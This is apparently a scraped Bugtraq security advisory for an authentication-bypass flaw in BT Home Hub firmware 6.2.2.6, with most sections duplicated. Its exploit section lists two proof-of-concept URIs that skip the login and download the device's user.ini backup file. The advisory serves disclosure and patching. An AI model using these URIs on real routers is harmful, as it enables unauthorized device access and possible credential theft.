BT Home Hub Login Procedure Authentication Bypass Vulnerability
BID:26333
Info
BT Home Hub Login Procedure Authentication Bypass Vulnerability
| Bugtraq ID: | 26333 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 05 2007 12:00AM |
| Updated: | Nov 15 2007 12:37AM |
| Credit: | David Smith is credited with discovering this issue. |
| Vulnerable: |
BT Home Hub 6.2.2.6 |
| Not Vulnerable: |
BT Home Hub 6.2.C.2 |
Discussion
BT Home Hub Login Procedure Authentication Bypass Vulnerability
BT Home Hub is prone to an authentication-bypass vulnerability.
An attacker could exploit this issue to gain unauthorized access to the affected device.
BT Home Hub firmware 6.2.2.6 is vulnerable; other versions may also be affected.
BT Home Hub is prone to an authentication-bypass vulnerability.
An attacker could exploit this issue to gain unauthorized access to the affected device.
BT Home Hub firmware 6.2.2.6 is vulnerable; other versions may also be affected.
Exploit / POC
BT Home Hub Login Procedure Authentication Bypass Vulnerability
An attacker can use a browser to exploit this issue.
The following exploit code and proof-of-concept URIs are available:
http://www.example.com/cgi/b/bandr
http://www.example.com/cgi/b/backup/user.ini/somerandomstringOnce
An attacker can use a browser to exploit this issue.
The following exploit code and proof-of-concept URIs are available:
http://www.example.com/cgi/b/bandr
http://www.example.com/cgi/b/backup/user.ini/somerandomstringOnce
Solution / Fix
BT Home Hub Login Procedure Authentication Bypass Vulnerability
Solution:
The vendor released an update to address this issue. Please contact the vendor for information on how to obtain and apply this update.
Solution:
The vendor released an update to address this issue. Please contact the vendor for information on how to obtain and apply this update.
References
BT Home Hub Login Procedure Authentication Bypass Vulnerability
References:
References:
- BT Home Hub Homepage (BT)